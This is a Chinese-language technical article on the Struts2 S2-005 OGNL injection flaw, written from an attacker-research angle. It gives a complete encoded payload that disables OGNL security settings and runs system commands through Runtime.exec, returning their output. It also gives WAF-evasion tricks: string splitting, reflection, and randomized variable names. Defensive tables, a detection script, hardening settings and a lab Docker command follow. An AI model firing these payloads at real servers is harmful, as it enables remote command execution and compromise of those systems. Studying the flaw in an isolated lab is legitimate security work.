Struts2 S2-005漏洞绕过技巧:从编码混淆到命令执行
Struts2 S2-005漏洞深度解析:从编码混淆到实战利用
在Web安全研究领域,Struts2框架的漏洞一直是攻防演练中的经典案例。S2-005作为早期但极具代表性的漏洞,其绕过思路至今仍对现代Web应用安全具有启示意义。本文将从一个实战研究者的视角,剖析该漏洞的底层原理、多种编码绕过技术,以及如何在实际环境中构造有效的攻击载荷。
1. S2-005漏洞的技术背景
Struts2框架使用OGNL(Object-Graph Navigation Language)作为表达式语言,这种设计原本是为了简化数据访问和操作,却为安全漏洞埋下了隐患。S2-005漏洞的特殊性在于它实际上是S2-003漏洞修复不彻底的产物——开发者试图通过过滤#字符来阻止OGNL表达式注入,但攻击者很快发现可以通过编码方式绕过这一限制。
漏洞的核心在于两个关键点:
- 参数解析机制:Struts2会将HTTP请求的每个参数名解析为OGNL表达式
- 安全限制绕过:通过Unicode编码(
\u0023)或八进制编码(\43)可以绕过对#字符的过滤
// 典型的安全过滤逻辑示例 if (param.contains("#")) { throw new SecurityException("Invalid character detected"); }这种过滤很容易被编码技术绕过,例如:
- Unicode编码:
#→\u0023 - 八进制编码:
#→\43 - URL编码:
#→%23
2. 编码混淆技术详解
2.1 多重编码组合技巧
在实际攻击场景中,单一的编码方式可能被WAF或安全设备检测到。高级攻击者通常会采用组合编码技术:
| 编码类型 | 示例 | 解码结果 |
|---|---|---|
| Unicode | \u0023context | #context |
| 八进制 | \43context | #context |
| 混合编码 | \u0023c\157ntext | #context |
| 分块拼接 | \u0023+co+ntext | #context |
# 编码转换工具函数示例 def encode_payload(payload): return payload.replace('#', r'\u0023').replace('_', r'\u005f')2.2 安全配置绕过技术
即使成功注入了OGNL表达式,Struts2的安全配置仍会阻止危险操作。攻击者需要通过OGNL表达式动态修改这些安全设置:
- 允许静态方法调用:
('\43_memberAccess.allowStaticMethodAccess')(a)=true - 启用方法执行:
('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b) - 清空排除属性列表:
('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c)
注意:实际攻击中这些操作需要在一个请求中完成,使用
&符号连接各表达式
3. 实战攻击链构建
3.1 基础命令执行POC分析
以下是经过优化的攻击载荷,包含完整的命令执行流程:
('\43_memberAccess.allowStaticMethodAccess')(a)=true& (b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))& ('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))& (g)(('\43mycmd\75\'whoami\'')(d))& (h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))& (i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))& (j)(('\43myres\75new\40byte[51020]')(d))& (k)(('\43mydat.readFully(\43myres)')(d))& (l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))& (m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))& (n)(('\43myout.getWriter().println(\43mystr)')(d))关键步骤解析:
- 初始化安全配置绕过
- 设置要执行的命令(
whoami) - 通过
Runtime.getRuntime().exec()执行命令 - 获取命令输出流并读取结果
- 将结果写入HTTP响应
3.2 高级利用技巧
对于存在WAF防护的环境,可以采用以下进阶技术:
字符串拆分技巧:
'\43req'='\43co'+'ntext.get'+'("com.o'+'pensymph'+'ony.xwork'+'2.disp'+'atcher.Ht'+'tpServ'+'letReq'+'uest")'反射调用技术:
('\43rt'='@java.lang.Class@forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null)')(x)& ('\43rt.exec("calc")')(y)环境变量隐藏技术:
# 生成随机变量名避免检测 import random def random_var(): return ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(8)) # 示例输出:'aBcDeFgH'4. 防御与检测方案
4.1 企业级防护措施
针对S2-005类漏洞,建议部署以下防御层:
| 防护层面 | 具体措施 | 有效性 |
|---|---|---|
| WAF规则 | 检测OGNL表达式特征、编码混淆模式 | ★★★★☆ |
| RASP防护 | 拦截危险反射调用、运行时方法执行 | ★★★★★ |
| 输入验证 | 严格校验参数名格式,禁止特殊字符 | ★★★☆☆ |
| 版本升级 | 升级到Struts2最新安全版本 | ★★★★★ |
4.2 检测脚本示例
以下Python代码可用于检测系统是否存在S2-005漏洞:
import requests def check_s2_005(target_url): test_payload = { '\43foo': 'bar' # 测试八进制编码的#字符 } try: r = requests.post(target_url, data=test_payload) if 'ognl.OgnlException' in r.text: return True except Exception as e: print(f"检测出错: {str(e)}") return False4.3 安全配置建议
在struts.xml中添加以下安全配置:
<constant name="struts.ognl.excludedClasses" value="java.lang.Runtime,java.lang.ProcessBuilder" /> <constant name="struts.ognl.excludePackageNames" value="java.lang,java.io" />在实验室环境中复现这类漏洞时,建议使用容器化技术隔离测试环境。以下Docker命令可以快速搭建测试环境:
docker run -d -p 8080:8080 vulhub/struts2:s2-005